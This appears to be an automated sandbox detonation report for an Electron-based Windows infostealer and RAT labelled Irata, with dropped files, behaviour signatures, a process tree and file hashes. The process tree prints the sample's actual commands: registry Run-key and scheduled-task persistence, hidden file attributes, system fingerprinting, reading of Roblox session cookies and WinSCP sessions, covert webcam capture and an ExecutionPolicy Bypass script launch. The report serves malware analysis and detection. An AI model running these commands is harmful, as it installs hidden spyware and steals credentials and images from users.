C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sr.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sl.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sk.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ru.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ro.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sw.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sv.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\th.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\te.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ta.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\zh-TW.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\zh-CN.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\vi.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\uk.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\tr.pak

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\elevate.exe

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\swiftshader\libEGL.dll

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\swiftshader\libGLESv2.dll

\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\StdUtils.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\v8_context_snapshot.bin

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

\Users\Admin\AppData\Local\Temp\b3c2ea1b-5420-4510-be00-6e6babf6d4ad.tmp.node

\Users\Admin\AppData\Local\Temp\3c3a714a-579a-4007-8062-419c067a8c08.tmp.node

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libegl.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_usirkkkm.cxt.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7sk8fjhx.default-release\places.sqlite_tmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

Analysis: behavioral3

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win10v2004-20231215-en

Max time kernel

120s

Max time network

163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupWJwS5S = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\TatsuBeta.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_WJwS5S = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_WJwS5S.vbs" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops autorun.inf file

Description Indicator Process Target
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3264 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4424 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 4424 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1704 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4424 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 4596 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1620 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1208 wrote to memory of 1200 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1724,7032267584485318978,5297624804189534909,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1952 --field-trial-handle=1724,7032267584485318978,5297624804189534909,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3264 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=3264 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3264 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=3264 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupWJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupWJwS5S /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupWJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupWJwS5S /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupWJwS5S /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\soIXumC0bYmQxblBVDpF\System\cam.4424_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\soIXumC0bYmQxblBVDpF\System\cam.4424_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs /f"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs\""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut4Qld0.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut4Qld0.ps1" -RunAsAdministrator

Network

Files


C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
